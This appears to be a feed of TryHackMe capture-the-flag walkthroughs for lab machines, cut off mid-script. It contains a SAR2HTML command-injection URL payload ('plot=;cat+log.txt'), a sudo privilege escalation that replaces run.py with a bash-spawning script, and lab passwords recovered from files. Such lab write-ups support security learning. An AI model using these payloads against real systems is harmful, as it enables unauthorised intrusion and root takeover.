c3RlbSgkbXMpOwp9CmVsc2UgaWYoJG1zPT09Indob2FtaSIpCnsKc3lzdGVtKCRtcyk7Cn0KZWxzZQp7CmVjaG8gIjxzY3JpcHQ+YWxlcnQoJ1JDRSBEZXRlY3RlZCEnKTwvc2NyaXB0PiI7CnNlc3Npb25fZGVzdHJveSgpOwp1bnNldCgkX1NFU1NJT05bJ2ZhdmNvbG9yJ10pOwpoZWFkZXIoIlJlZnJlc2g6IDAuMTsgdXJsPWluZGV4Lmh0bWwiKTsKfQp9Cn0KZWxzZQp7CmVjaG8gIjxzY3JpcHQ+YWxlcnQoJ09ubHkgQWRtaW5zIGNhbiBhY2Nlc3MgdGhpcyBwYWdlIScpPC9zY3JpcHQ+IjsKc2Vzc2lvbl9kZXN0cm95KCk7CnVuc2V0KCRfU0VTU0lPTlsnZmF2Y29sb3InXSk7CmhlYWRlcigiUmVmcmVzaDogMC4xOyB1cmw9aW5kZXguaHRtbCIpOwp9Cj8+Cg== </code></pre> </div> <p>Now lets decode it (you can use online decoders just browsing it).<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="cp">&lt;!DOCTYPE html&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;head&gt;</span> <span class="nt">&lt;style&gt;</span> <span class="nt">form</span> <span class="p">{</span> <span class="nl">border</span><span class="p">:</span> <span class="m">2px</span> <span class="nb">solid</span> <span class="no">black</span><span class="p">;</span> <span class="nl">outline</span><span class="p">:</span> <span class="m">#4CAF50</span> <span class="nb">solid</span> <span class="m">3px</span><span class="p">;</span> <span class="nl">margin</span><span class="p">:</span> <span class="nb">auto</span><span class="p">;</span> <span class="nl">width</span><span class="p">:</span><span class="m">180px</span><span class="p">;</span> <span class="nl">padding</span><span class="p">:</span> <span class="m">20px</span><span class="p">;</span> <span class="nl">text-align</span><span class="p">:</span> <span class="nb">center</span><span class="p">;</span> <span class="p">}</span> <span class="nt">ul</span> <span class="p">{</span> <span class="nl">list-style-type</span><span class="p">:</span> <span class="nb">none</span><span class="p">;</span> <span class="nl">margin</span><span class="p">:</span> <span class="m">0</span><span class="p">;</span> <span class="nl">padding</span><span class="p">:</span> <span class="m">0</span><span class="p">;</span> <span class="nl">overflow</span><span class="p">:</span> <span class="nb">hidden</span><span class="p">;</span> <span class="nl">background-color</span><span class="p">:</span> <span class="m">#333</span><span class="p">;</span> <span class="p">}</span> <span class="nt">li</span> <span class="p">{</span> <span class="nl">float</span><span class="p">:</span> <span class="nb">left</span><span class="p">;</span> <span class="nl">border-right</span><span class="p">:</span><span class="m">1px</span> <span class="nb">solid</span> <span class="m">#bbb</span><span class="p">;</span> <span class="p">}</span> <span class="nt">li</span><span class="nd">:last-child</span> <span class="p">{</span> <span class="nl">border-right</span><span class="p">:</span> <span class="nb">none</span><span class="p">;</span> <span class="p">}</span> <span class="nt">li</span> <span class="nt">a</span> <span class="p">{</span> <span class="nl">display</span><span class="p">:</span> <span class="nb">block</span><span class="p">;</span> <span class="nl">color</span><span class="p">:</span> <span class="no">white</span><span class="p">;</span> <span class="nl">text-align</span><span class="p">:</span> <span class="nb">center</span><span class="p">;</span> <span class="nl">padding</span><span class="p">:</span> <span class="m">14px</span> <span class="m">16px</span><span class="p">;</span> <span class="nl">text-decoration</span><span class="p">:</span> <span class="nb">none</span><span class="p">;</span> <span class="p">}</span> <span class="nt">li</span> <span class="nt">a</span><span class="nd">:hover:not</span><span class="o">(</span><span class="nc">.active</span><span class="o">)</span> <span class="p">{</span> <span class="nl">background-color</span><span class="p">:</span> <span class="m">#111</span><span class="p">;</span> <span class="p">}</span> <span class="nc">.active</span> <span class="p">{</span> <span class="nl">background-color</span><span class="p">:</span> <span class="no">blue</span><span class="p">;</span> <span class="p">}</span> <span class="nt">&lt;/style&gt;</span> <span class="nt">&lt;/head&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;ul&gt;</span> <span class="nt">&lt;li&gt;&lt;a</span> <span class="na">href=</span><span class="s">"dashboard.php"</span><span class="nt">&gt;</span>Dashboard<span class="nt">&lt;/a&gt;&lt;/li&gt;</span> <span class="nt">&lt;li&gt;&lt;a</span> <span class="na">href=</span><span class="s">"with.php"</span><span class="nt">&gt;</span>Withdraw Money<span class="nt">&lt;/a&gt;&lt;/li&gt;</span> <span class="nt">&lt;li&gt;&lt;a</span> <span class="na">href=</span><span class="s">"depo.php"</span><span class="nt">&gt;</span>Deposit Money<span class="nt">&lt;/a&gt;&lt;/li&gt;</span> <span class="nt">&lt;li&gt;&lt;a</span> <span class="na">href=</span><span class="s">"tra.php"</span><span class="nt">&gt;</span>Transfer Money<span class="nt">&lt;/a&gt;&lt;/li&gt;</span> <span class="nt">&lt;li&gt;&lt;a</span> <span class="na">href=</span><span class="s">"acc.php"</span><span class="nt">&gt;</span>My Account<span class="nt">&lt;/a&gt;&lt;/li&gt;</span> <span class="nt">&lt;li&gt;&lt;a</span> <span class="na">href=</span><span class="s">"forms.php"</span><span class="nt">&gt;</span>command<span class="nt">&lt;/a&gt;&lt;/li&gt;</span> <span class="nt">&lt;li&gt;&lt;a</span> <span class="na">href=</span><span class="s">"logout.php"</span><span class="nt">&gt;</span>Logout<span class="nt">&lt;/a&gt;&lt;/li&gt;</span> <span class="nt">&lt;li</span> <span class="na">style=</span><span class="s">"float:right"</span><span class="nt">&gt;&lt;a</span> <span class="na">href=</span><span class="s">"contact.php"</span><span class="nt">&gt;</span>Contact Us<span class="nt">&lt;/a&gt;&lt;/li&gt;</span> <span class="nt">&lt;/ul&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;</span> <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> <span class="cp">&lt;?php session_start(); if(isset($_SESSION['favcolor']) and $_SESSION['favcolor']==="admin@bank.a") { echo "&lt;h3 style='text-align:center;'&gt;Weclome to Account control panel&lt;/h3&gt;"; echo "&lt;form method='POST'&gt;"; echo "&lt;input type='text' placeholder='Account number' name='acno'&gt;"; echo "&lt;br&gt;&lt;br&gt;&lt;br&gt;"; echo "&lt;input type='text' placeholder='Message' name='msg'&gt;"; echo "&lt;input type='submit' value='Send' name='btn'&gt;"; echo "&lt;/form&gt;"; //MY CREDS :- cyber:super#secure&amp;password! if(isset($_POST['btn'])) { $ms=$_POST['msg']; echo "ms:".$ms; if($ms==="id") { system($ms); } else if($ms==="whoami") { system($ms); } else { echo "&lt;script&gt;alert('RCE Detected!')&lt;/script&gt;"; session_destroy(); unset($_SESSION['favcolor']); header("Refresh: 0.1; url=index.html"); } } } else { echo "&lt;script&gt;alert('Only Admins can access this page!')&lt;/script&gt;"; session_destroy(); unset($_SESSION['favcolor']); header("Refresh: 0.1; url=index.html"); } ?&gt;</span> </code></pre> </div> <p>Here we have: <code>//MY CREDS :- cyber:super#secure&amp;password!</code></p> <p>Now let's try to login using SSH.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2tjuajgxpjsnblwn7fhw.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2tjuajgxpjsnblwn7fhw.png" alt=" " width="800" height="117"></a></p> <p>After logged in, we have <code>flag1.txt</code>. Now lets find others. We got also python file called <code>run.py</code>. But it requires admin privilege. So let's keep digging.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>drwx------ 3 cyber cyber 4096 Nov 17 2020 <span class="nb">.</span> drwxr-xr-x 4 root root 4096 Nov 16 2020 .. <span class="nt">-rw-------</span> 1 cyber cyber 0 Nov 17 2020 .bash_history <span class="nt">-rw-r--r--</span> 1 cyber cyber 220 Nov 9 2020 .bash_logout <span class="nt">-rw-r--r--</span> 1 cyber cyber 3637 Nov 9 2020 .bashrc drwx------ 2 cyber cyber 4096 Nov 9 2020 .cache <span class="nt">-rw--w----</span> 1 cyber cyber 85 Nov 15 2020 flag1.txt <span class="nt">-rw-r--r--</span> 1 cyber cyber 675 Nov 9 2020 .profile <span class="nt">-rwx------</span> 1 root root 349 Nov 15 2020 run.py </code></pre> </div> <p>We don't have other interesting files but but <code>run.py</code>. Now let's run <code>sudo -l</code> and check what permissions does Cyber has.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>Matching Defaults entries <span class="k">for </span>cyber on ubuntu: env_reset, mail_badpass, <span class="nv">secure_path</span><span class="o">=</span>/usr/local/sbin<span class="se">\:</span>/usr/local/bin<span class="se">\:</span>/usr/sbin<span class="se">\:</span>/usr/bin<span class="se">\:</span>/sbin<span class="se">\:</span>/bin User cyber may run the following commands on ubuntu: <span class="o">(</span>root<span class="o">)</span> NOPASSWD: /usr/bin/python3 /home/cyber/run.py </code></pre> </div> <p>Looking the output, if we can edit or change the <code>run.py</code> file, we can run any python file as <code>root</code>.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>cyber@ubuntu:~<span class="nv">$ </span><span class="nb">ls</span> <span class="nt">-la</span> /home/cyber/run.py <span class="nt">-rwx------</span> 1 root root 349 Nov 15 2020 /home/cyber/run.py </code></pre> </div> <p>The owner of the file is <code>root</code>. But we can edit or run files with sudo rights. So, let's create new <code>run.py</code> and use it to get root access.</p> <p>First, you can run <code>mv run.py run.py.hack</code> and create new file and run.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>cyber@ubuntu:~<span class="nv">$ </span>vim run.py cyber@ubuntu:~<span class="nv">$ </span><span class="nb">cat </span>run.py import os os.system<span class="o">(</span><span class="s2">"/bin/bash"</span><span class="o">)</span> cyber@ubuntu:~<span class="nv">$ </span><span class="nb">sudo</span> /usr/bin/python3 /home/cyber/run.py root@ubuntu:~# </code></pre> </div> <p>If we go to <code>/home/yash</code> we got <code>flag2.txt</code>. There is also <code>root.txt</code> in the same folder but it throws a message. Let's go to <code>/root</code> and finish the lab.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>root@ubuntu:/# <span class="nb">cd </span>root/ root@ubuntu:/root# <span class="nb">ls </span>root.txt root@ubuntu:/root# <span class="nb">cat </span>root.txt ████████████████████████████████████ ██ ██ ██ ████ ████ ████ ████ ████ ████ ██ ████ ████ ████ ████ ████ ████ ██ ████ ████ ████ ████ ████ ████ ██ ████ ████ ████ ████ ████ ████ ██ ████ ████ ████ ████ ████ ████ ██ ██ ████████████████████████████████████ battery designed by cyberbot :<span class="o">)</span> Please give your reviews on catch_me75@protonmail.com or discord cyberbot#1859 THM<span class="o">{</span>ROOT_FLAG<span class="o">}</span> </code></pre> </div> <p>Hope you found it useful. If you have any other questions. I'm happy to help!!</p> <p><a href="https://www.linkedin.com/in/mikail-kakabayev-5401183aa?utm_source=share_via&amp;utm_content=profile&amp;utm_medium=member_ios" rel="noopener noreferrer">https://www.linkedin.com/in/mikail-kakabayev</a></p> <p>HAPPY HACKING !!!</p> security learning testing TryHackMe | BoilerCTF | WALKTHROUGH Mikail Kakabayev Sun, 17 May 2026 21:10:34 +0000 https://forem.com/kaaayii/tryhackme-boilerctf-walkthrough-3dk8 https://forem.com/kaaayii/tryhackme-boilerctf-walkthrough-3dk8 <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>LAB: BoilerCTF (TryHackMe) DIFFICULTY: Medium TARGET: root.txt TOOLS: Nmap, Gobuster VULNERABLE: SAR2HTML 3.2.1 (RCE) We'll gain root privileges and capture root.txt by exploiting SAR2HTML 3.2.1 (RCE). </code></pre> </div> <p>We start with an <strong>Nmap</strong> scan to discover open ports and running services on the target machine.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>nmap <span class="nt">-sC</span> <span class="nt">-sV</span> <span class="o">{</span>LABS_IP_ADDRESS<span class="o">}</span> </code></pre> </div> <p>Flags:</p> <ul> <li>-sC - Runs Nmap's default set of safe scripts</li> <li>-sV - Probes open ports to identify service versions</li> </ul> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6a6b0oh3ns9kpurxewps.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6a6b0oh3ns9kpurxewps.png" alt=" " width="800" height="476"></a></p> <p><strong>Breakdown:</strong></p> <ul> <li><p><strong>Port 21 (FTP)</strong> — Anonymous login is enabled. This means anyone can connect without a password. We'll log in and see if any files are accessible.</p></li> <li><p><strong>Port 80 (HTTP)</strong> — An Apache web server. The presence of <code>/robots.txt</code> suggests there may be hidden directories. We'll use Gobuster or FFUF to find them.</p></li> <li><p><strong>Port 10000 (Webmin)</strong> — A web-based administration panel. This could be a path to root if we find credentials or a known exploit.</p></li> </ul> <p>Let's find what we got on FTP:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Frbrkaxjo1xgwmt5uw9j0.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Frbrkaxjo1xgwmt5uw9j0.png" alt=" " width="750" height="204"></a></p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F80w59362hq29kq4xmyoj.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F80w59362hq29kq4xmyoj.png" alt=" " width="800" height="207"></a></p> <p>There is hidden file called <code>info.txt</code>.<br> We can download it using <code>get</code> command and check what's inside.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>get .info.txt </code></pre> </div> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fl75x3znnbu2xd5lp43wr.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fl75x3znnbu2xd5lp43wr.png" alt=" " width="800" height="42"></a></p> <p>Here we have ROT13 encoded text. We can decode it by following command:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">echo</span> <span class="s2">"Whfg jnagrq gb frr vs lbh svaq vg. Yby. Erzrzore: Rahzrengvba vf gur xrl"</span> | <span class="nb">tr</span> <span class="s1">'A-Za-z'</span> <span class="s1">'N-ZA-Mn-za-m'</span> </code></pre> </div> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7pah85d00w6421knaok1.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7pah85d00w6421knaok1.png" alt=" " width="800" height="46"></a></p> <p>After decoding we got nothing interesting here. So let's continue.</p> <p>We have <code>robots.txt</code> and <code>Webmin</code> admin running on port 10000.</p> <p>Lets first check <code>robots.txt</code></p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7y9k04f501qjfgwbyjjg.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7y9k04f501qjfgwbyjjg.png" alt=" " width="800" height="156"></a></p> <p>The robots.txt file contained multiple disallowed paths. Most appear to be rabbit holes (the creator literally includes <code>/a+rabbit</code> as an entry). The entries like <code>/.ssh</code> and <code>/tmp</code> are not web-accessible and can be ignored. </p> <p>Below the robots.txt entries, I found ASCII decimal numbers:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>079 084 108 105 077 068 089 050 077 071 078 107 079 084 086 104 090 071 086 104 077 122 073 051 089 122 085 048 077 084 103 121 089 109 070 104 078 084 069 049 079 068 081 075 </code></pre> </div> <p>Each number represents an ASCII character code. After decoding, I got:</p> <p><code>OTliMDY2MGNkOTVhZGVhMzI3YzU0MTgyYmFhNTE1ODQK</code></p> <p>This looks like Base64. Let's decode it:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">echo</span> <span class="s2">"OTliMDY2MGNkOTVhZGVhMzI3YzU0MTgyYmFhNTE1ODQK"</span> | <span class="nb">base64</span> <span class="nt">-d</span> </code></pre> </div> <p>This appears to be a hash or key. I'll save it for now, though it may be another rabbit hole.</p> <p>Next, I used Gobuster to discover hidden directories on the web server.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnli9agkuptfl3tugno3a.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnli9agkuptfl3tugno3a.png" alt=" " width="800" height="390"></a></p> <p>As a result we have <code>/joomla</code> and <code>/manual</code> directories.</p> <p>Let's try <code>/manual</code>.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F48h1ssxdk4rk6i5ti20s.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F48h1ssxdk4rk6i5ti20s.png" alt=" " width="800" height="561"></a></p> <p>It's just an Apache Documentation. Nothing interesting here.</p> <p>Now, let's try <code>/joomla</code>.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpzr2d9hqrnebf08oiupt.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpzr2d9hqrnebf08oiupt.png" alt=" " width="800" height="1132"></a></p> <p>It's a small webpage, I did some research but found nothing except a login form.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fejscypfy0wo897yu2ygp.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fejscypfy0wo897yu2ygp.png" alt=" " width="476" height="576"></a></p> <p>I tested the login page for information disclosure by entering invalid credentials and analyzing the error messages. When i try 1 (for username) and 1234 (for password) it says:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4w55ncesccdxw9qbhylr.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4w55ncesccdxw9qbhylr.png" alt=" " width="800" height="373"></a><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>#### Warning JUser: :_load: Unable to load user with ID: 1 Username and password do not match or you do not have an account yet. </code></pre> </div> <p>When I entered <code>1</code> (a number) as the username, Joomla's backend tried to load user ID <code>1</code> (the default admin account) instead of treating <code>1</code> as a username string. The error <code>Unable to load user with ID: 1</code> suggests:</p> <ul> <li><p>User ID 1 <strong>exists</strong> in the database</p></li> <li><p>But something is wrong (maybe the account is disabled, deleted, or corrupted)</p></li> </ul> <p>This is a minor information disclosure vulnerability, but couldn't go far.</p> <p>Let's run Gobuster again for <code>http://{LABS_IP_ADDRESS}/joomla/</code> and check what we got next.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Feow2lwrfchd3xkz5a0ka.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Feow2lwrfchd3xkz5a0ka.png" alt=" " width="800" height="828"></a></p> <p>By checking interesting directories such as: <code>/_archive</code>, <code>/_files</code>, <code>/_database</code> and <code>/temp</code>. I found some notes which is not really important. But in <code>/_files</code>, i found a base64 encoded text and decoded it.</p> <p><code>V2hvcHNpZSBkYWlzeQo=</code></p> <p>I'll keep this also for future use.</p> <p>Now lets check <code>/administrator</code>.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsd22cuketg5n0t8dvo0i.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsd22cuketg5n0t8dvo0i.png" alt=" " width="762" height="706"></a></p> <p>Found one more login page. Also tried some basic possible vulnerability tests, but still nothing.</p> <p>Now when i try <code>/_test</code> endpoint.</p> <p>It gave me:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fizz3xyctsxtnz8r47wd4.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fizz3xyctsxtnz8r47wd4.png" alt=" " width="800" height="360"></a></p> <p>It runs SAR2HTML, which is designed for system administrators. I found that SAR2HTML 3.2.1 contains a critical security flaw ( Remote Command Execution ). The application takes user input (specifically the <code>plot</code> parameter in the URL) and passes it directly to the server's operating system without checking if it is safe. Because there is no sanitization, you can trick the server into running any command you want by adding a semicolon (<code>;</code>) or a pipe (<code>|</code>) to the URL.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6n1khqp2q7v6cx3xifeo.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6n1khqp2q7v6cx3xifeo.png" alt=" " width="800" height="280"></a></p> <p>By checking <a href="https://www.exploit-db.com/exploits/47204" rel="noopener noreferrer">https://www.exploit-db.com/exploits/47204</a>, we understand that <code>http://&lt;ipaddr&gt;/index.php?plot=;&lt;command-here&gt;</code> going to execute the command that we want. I entered basic command to check if it works.</p> <p>I changed <code>http://{LABS_IP_ADDRESS}/joomla/_test/index.php?plot=NEW</code> to <code>http://{LABS_IP_ADDRESS}/joomla/_test/index.php?plot=;ls</code> and BOOM!</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjgqz3pndbs36nqoum0ix.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjgqz3pndbs36nqoum0ix.png" alt=" " width="610" height="628"></a></p> <p>It displays the files from current directory.</p> <p>Let's see whats inside <code>log.txt</code> file by typing:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>http://<span class="o">{</span>LABS_IP_ADDRESS<span class="o">}</span>/joomla/_test/index.php?plot<span class="o">=</span><span class="p">;</span><span class="nb">cat</span>+log.txt </code></pre> </div> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fp002lkwxo5oyb3t4vv1p.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fp002lkwxo5oyb3t4vv1p.png" alt=" " width="800" height="397"></a></p> <p>We can see that there is users called <code>basterd</code> and <code>pentest</code>, including password which is <code>superduperp@$$</code>.</p> <p>On the Nmap scan, there is SSH running on port 55007.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvhhxob9ubqrthxivkkqy.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvhhxob9ubqrthxivkkqy.png" alt=" " width="800" height="111"></a></p> <p>Let's try to login using the credentials that we found.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgykjfpgi8l0dntvx2b8a.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgykjfpgi8l0dntvx2b8a.png" alt=" " width="800" height="325"></a></p> <p>And we're in.</p> <p>There is a <code>backup.sh</code> file in current directory. Lets check it.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nv">REMOTE</span><span class="o">=</span>1.2.3.4 <span class="nv">SOURCE</span><span class="o">=</span>/home/stoner <span class="nv">TARGET</span><span class="o">=</span>/usr/local/backup <span class="nv">LOG</span><span class="o">=</span>/home/stoner/bck.log <span class="nv">DATE</span><span class="o">=</span><span class="sb">`</span><span class="nb">date</span> +%y<span class="se">\.</span>%m<span class="se">\.</span>%d<span class="se">\.</span><span class="sb">`</span> <span class="nv">USER</span><span class="o">=</span>stoner <span class="c">#superduperp@$$no1knows</span> ssh <span class="nv">$USER</span>@<span class="nv">$REMOTE</span> <span class="nb">mkdir</span> <span class="nv">$TARGET</span>/<span class="nv">$DATE</span> <span class="k">if</span> <span class="o">[</span> <span class="nt">-d</span> <span class="s2">"</span><span class="nv">$SOURCE</span><span class="s2">"</span> <span class="o">]</span><span class="p">;</span> <span class="k">then for </span>i <span class="k">in</span> <span class="sb">`</span><span class="nb">ls</span> <span class="nv">$SOURCE</span> | <span class="nb">grep</span> <span class="s1">'data'</span><span class="sb">`</span><span class="p">;</span><span class="k">do </span><span class="nb">echo</span> <span class="s2">"Begining copy of"</span> <span class="nv">$i</span> <span class="o">&gt;&gt;</span> <span class="nv">$LOG</span> scp <span class="nv">$SOURCE</span>/<span class="nv">$i</span> <span 